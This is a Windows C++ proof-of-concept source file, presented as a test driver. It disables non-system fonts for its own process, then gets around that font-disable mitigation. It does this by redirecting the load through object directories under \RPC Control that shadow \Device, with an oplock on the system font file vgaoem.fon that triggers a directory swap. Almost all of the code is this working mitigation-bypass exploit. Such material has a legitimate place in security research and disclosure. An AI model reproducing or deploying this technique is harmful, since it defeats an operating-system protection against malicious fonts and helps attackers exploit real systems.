#include "stdafx.h"
#include <Shlwapi.h>
#include <string>
#include <vector>
#include "ScopedHandle.h"

// Face name of the test font. It is also used to build the file name
// "<FONT_NAME>.ttf" next to the executable (see GetLocalFontPath). It is kept
// as a macro so it can be pasted into adjacent wide-string literals.
#define FONT_NAME L"pacifico"

// NOTE(review): not referenced by any code visible in this file; possibly
// dead. Confirm before removing.
const wchar_t kFontSymlinkName[] = L"\\RPC Control\\fonttest";

// Returns the directory that contains the running executable: the module
// path with its final "\component" removed.
// Exits the process if the module path cannot be retrieved or does not fit
// in MAX_PATH characters.
std::wstring GetAppPath()
{
  // Zero-initialised so a failed call can never expose uninitialised memory.
  WCHAR apppath[MAX_PATH] = {};

  // GetModuleFileName returns 0 on failure. It returns the buffer size when
  // the path was truncated. In both cases the buffer is not a usable path.
  const auto length = GetModuleFileName(nullptr, apppath, MAX_PATH);
  if (length == 0 || length >= MAX_PATH)
  {
    printf("[ERROR] Couldn't get the module file name\n");
    exit(1);
  }

  wchar_t* last_sep = wcsrchr(apppath, L'\\');
  if (last_sep)
  {
    *last_sep = L'\0';
  }
  return apppath;
}

std::wstring GetSystemFontPath()
{
  PWSTR path = nullptr;
  HRESULT hr = SHGetKnownFolderPath(FOLDERID_Fonts, 0, nullptr, &path);
  if (FAILED(hr))
  {
    printf("Error getting font path: %08X\n", hr);
    exit(1);
  }
  std::wstring ret = path;
  CoTaskMemFree(path);

  ret += L"\\vgaoem.fon";

  return ret;
}

// Path of the test font file "<FONT_NAME>.ttf" in the executable's directory.
std::wstring GetLocalFontPath()
{
  std::wstring font_file = GetAppPath();
  font_file += L"\\" FONT_NAME L".ttf";
  return font_file;
}

// Registers font_path as a private font (AddFontResourceEx with FR_PRIVATE).
// It then asks GDI for a font named FONT_NAME and reads back the face that
// was actually selected into a memory DC.
// Returns TRUE when that face name equals FONT_NAME (case-insensitive),
// i.e. the font from font_path was usable.
// The font resource stays registered; only the GDI objects created here
// (font and DC) are released before returning.
BOOL TestFontLoad(const std::wstring& font_path)
{
  const int nResults = AddFontResourceEx(
    font_path.c_str(),
    FR_PRIVATE,    // font characteristics: usable by this process only
    nullptr);
  printf("[INFO] Font Load Count: %d\n", nResults);

  HFONT hFont = CreateFont(16, 16, 0, 0, FW_DONTCARE,
    0, 0, 0, 0, 0, 0, 0, 0, FONT_NAME);
  HDC dc = CreateCompatibleDC(nullptr);
  auto hOldFont = SelectObject(dc, hFont);

  constexpr int kFaceLen = 100;
  WCHAR font[kFaceLen] = {};
  GetTextFace(dc, kFaceLen, font);
  printf("[INFO] Captured Face: %ls\n", font);

  // Release the GDI objects created above. Restore the DC's previous font
  // first, because a font must not be deleted while it is selected into a DC.
  if (dc)
  {
    if (hOldFont)
    {
      SelectObject(dc, hOldFont);
    }
    DeleteDC(dc);
  }
  if (hFont)
  {
    DeleteObject(hFont);
  }

  return _wcsicmp(font, FONT_NAME) == 0;
}

void DisableCustomFonts()
{
  PROCESS_MITIGATION_FONT_DISABLE_POLICY setpolicy = {};  
  setpolicy.DisableNonSystemFonts = 1;

  if (!SetProcessMitigationPolicy(ProcessFontDisablePolicy, &setpolicy, sizeof(setpolicy)))
  {
    printf("[ERROR] Couldn't disable custom fonts (%ls). Running on Windows 10?\n", GetErrorMessage().c_str());
    exit(1);
  }
}

// Creates object directory `path` (relative to hRoot, or absolute when hRoot
// is null) with the existing directory `shadow` as its shadow directory.
// Returns the new directory handle. Exits the process if either the shadow
// cannot be opened or the new directory cannot be created.
// The shadow handle is owned by a ScopedHandle local to this function.
HANDLE CreateObjectDirectoryShadow(HANDLE hRoot, LPCWSTR path, LPCWSTR shadow)
{
  ScopedHandle shadow_dir(OpenObjectDirectory(nullptr, shadow), false);
  if (!shadow_dir)
  {
    printf("[ERROR] Couldn't open shadow directory %ls\n", shadow);
    exit(1);
  }

  HANDLE created = CreateObjectDirectory(hRoot, path, shadow_dir);
  if (created != nullptr)
  {
    return created;
  }

  printf("[ERROR] Couldn't create object directory %ls\n", path);
  exit(1);
}

// Callback passed to FileOpLock::CreateLock in wmain.
// It closes the handle passed in `arg`, then recreates \RPC Control\ABC as
// an object directory whose shadow is \Device.
// NOTE(review): when FileOpLock invokes this (presumably once the oplock on
// the system font file breaks) is defined by FileOpLock. Confirm.
void OplockCallback(LPVOID arg)
{
  printf("Switching object directory\n");
  // arg is the value wmain passes to CreateLock: the handle returned by
  // CreateDirectoryChain. Closing it presumably frees the name
  // \RPC Control\ABC so it can be recreated below. TODO confirm.
  CloseHandle(arg);
  // The returned handle is only null-checked, never closed. Presumably this
  // is intentional, to keep the new directory alive for the process lifetime.
  // CreateObjectDirectoryShadow already exits on failure, so this branch is
  // effectively unreachable.
  if (!CreateObjectDirectoryShadow(nullptr, L"\\RPC Control\\ABC", L"\\Device"))
  {
    printf("[ERROR] Creating new object directory\n");
    exit(1);
  }
}

std::wstring GetRootDriveVolumeName(const std::wstring& drive)
{
  WCHAR drive_path[3];
  WCHAR target_path[MAX_PATH];

  if (drive.size() < 2)
  {
    printf("Invalid drive path: %ls\n", drive.c_str());
    exit(1);
  }

  drive_path[0] = drive[0];
  drive_path[1] = drive[1];
  drive_path[2] = 0;

  if (QueryDosDevice(drive_path, target_path, MAX_PATH) == 0)
  {
    printf("Error querying drive %ls %ls\n", drive_path, GetErrorMessage().c_str());
    exit(1);
  }

  WCHAR* p = wcsrchr(target_path, '\\');
  if (p)
    return p + 1;
  return target_path;
}

// Splits `path` on backslashes. A run of consecutive backslashes counts as a
// single separator. A leading separator yields an empty first component and
// a trailing separator yields an empty last component. The result always has
// at least one element. As with C-string handling, anything after an
// embedded NUL character is ignored.
std::vector<std::wstring> GetPathComponents(const std::wstring& path)
{
  const std::wstring text(path.c_str());
  std::vector<std::wstring> parts;

  std::wstring::size_type start = 0;
  for (;;)
  {
    const std::wstring::size_type sep = text.find(L'\\', start);
    if (sep == std::wstring::npos)
    {
      parts.push_back(text.substr(start));
      return parts;
    }

    parts.push_back(text.substr(start, sep - start));

    // Skip the whole run of separators before the next component.
    start = text.find_first_not_of(L'\\', sep);
    if (start == std::wstring::npos)
    {
      start = text.size();
    }
  }
}

// Path of the scratch directory "XYZ" inside the executable's directory.
std::wstring GetDummyDirPath()
{
  return GetAppPath() + L"\\XYZ";
}

// Builds an object-directory tree that mirrors the dummy directory's path:
//   \RPC Control\ABC\<volume of dummy dir>\<middle components...>\<last>
// The final component is created as a shadow of \Device.
// Returns the handle for \RPC Control\ABC.
// Intermediate handles are never closed. Presumably this keeps the
// directories alive for the rest of the process; confirm before adding
// cleanup. Exits the process if any directory in the chain cannot be created.
HANDLE CreateDirectoryChain()
{
  const std::wstring dummy_dir = GetDummyDirPath();
  const std::vector<std::wstring> components = GetPathComponents(dummy_dir);

  // Abort with a diagnostic rather than passing a null root handle on to the
  // next CreateObjectDirectory call.
  auto require_dir = [](HANDLE handle, const wchar_t* name) {
    if (!handle)
    {
      printf("[ERROR] Couldn't create object directory %ls\n", name);
      exit(1);
    }
    return handle;
  };

  const wchar_t kRootDir[] = L"\\RPC Control\\ABC";
  HANDLE hDir = require_dir(CreateObjectDirectory(nullptr, kRootDir, nullptr), kRootDir);

  // components[0] (the drive part) is replaced by the drive's volume name.
  const std::wstring volume = GetRootDriveVolumeName(dummy_dir);
  HANDLE hCurrDir = require_dir(CreateObjectDirectory(hDir, volume.c_str(), nullptr), volume.c_str());

  // Middle components only; the last one is created as a shadow below.
  for (size_t i = 1; i + 1 < components.size(); ++i)
  {
    hCurrDir = require_dir(CreateObjectDirectory(hCurrDir, components[i].c_str(), nullptr),
                           components[i].c_str());
  }

  CreateObjectDirectoryShadow(hCurrDir, components.back().c_str(), L"\\Device");

  return hDir;
}

// Recreates the layout of the system font path under the dummy directory:
//   <dummy>\<volume of font path>\<middle components...>\<font file name>
// It copies the local test font (GetLocalFontPath) to that location,
// overwriting any existing file, and returns the destination path.
// Exits the process if the copy fails.
std::wstring CopyLocalFontToPath()
{
  std::wstring dir_path = GetDummyDirPath();
  // Resolve the system font path once; it is needed for both the volume name
  // and the directory components.
  const std::wstring system_font = GetSystemFontPath();
  const std::wstring system_font_device = GetRootDriveVolumeName(system_font);

  // CreateDirectory failures are ignored on purpose: the directories may
  // already exist from a previous run. A genuinely unusable path is caught
  // by the CopyFile check below.
  CreateDirectory(dir_path.c_str(), nullptr);
  dir_path += L"\\" + system_font_device;
  CreateDirectory(dir_path.c_str(), nullptr);

  const std::vector<std::wstring> system_path = GetPathComponents(system_font);

  // Skip components[0] (the drive, replaced by the volume above) and the
  // final component (the file name, appended after the loop).
  for (size_t i = 1; i + 1 < system_path.size(); ++i)
  {
    dir_path += L"\\" + system_path[i];
    CreateDirectory(dir_path.c_str(), nullptr);
  }

  dir_path += L"\\" + system_path.back();

  if (!CopyFile(GetLocalFontPath().c_str(), dir_path.c_str(), FALSE))
  {
    printf("[ERROR] Couldn't copy font file to %ls\n", dir_path.c_str());
    exit(1);
  }

  return dir_path;
}

// Test driver, run in this order:
//  1. Disable non-system fonts for this process.
//  2. Copy the local font into a mirror of the system font path and check
//     that loading it directly fails.
//  3. Build the object-directory chain and an oplock on the system font
//     file, then check that loading the font through the
//     \\?\GLOBALROOT\RPC Control\ABC\... path succeeds.
// Returns 0 only when both checks give the expected result; otherwise it
// returns/exits with 1.
int wmain(int argc, WCHAR** argv)
{
  // Command-line arguments are not used.
  (void)argc;
  (void)argv;

  DisableCustomFonts();
  const std::wstring local_path = CopyLocalFontToPath();

  printf("[TEST] loading %ls directly\n", local_path.c_str());

  if (GetFileAttributes(local_path.c_str()) == INVALID_FILE_ATTRIBUTES)
  {
    printf("Couldn't find font file %ls\n", local_path.c_str());
    exit(1);
  }

  if (TestFontLoad(local_path))
  {
    printf("[ERROR] Unexpected success of custom font loading, maybe already loaded?\n");
    exit(1);
  }
  printf("[SUCCESS] Direct loading of the font failed as expected\n");

  const std::wstring system_font = GetSystemFontPath();

  // Replace the "X:" drive prefix of local_path with
  // \\?\GLOBALROOT\RPC Control\ABC\<volume name>.
  std::wstring native_path = L"\\\\?\\GLOBALROOT\\RPC Control\\ABC\\" + GetRootDriveVolumeName(local_path);
  native_path += &local_path[2];

  printf("[INFO] Native Path: %ls\n", native_path.c_str());

  HANDLE hFakeDir = CreateDirectoryChain();

  // NOTE(review): the FileOpLock is never released here. Its ownership rules
  // live in FileOpLock; the process ends right after, so this is harmless
  // unless this body is reused.
  FileOpLock* oplock = FileOpLock::CreateLock(system_font, L"", OplockCallback, hFakeDir);
  if (!oplock)
  {
    printf("[ERROR] creating oplock\n");
    exit(1);
  }

  if (!TestFontLoad(native_path))
  {
    // Report failure instead of falling through to the success message.
    printf("[ERROR] Failed to load custom font!\n");
    return 1;
  }
  printf("[SUCCESS] Indirect loading of the font succeeded\n");

  return 0;
}

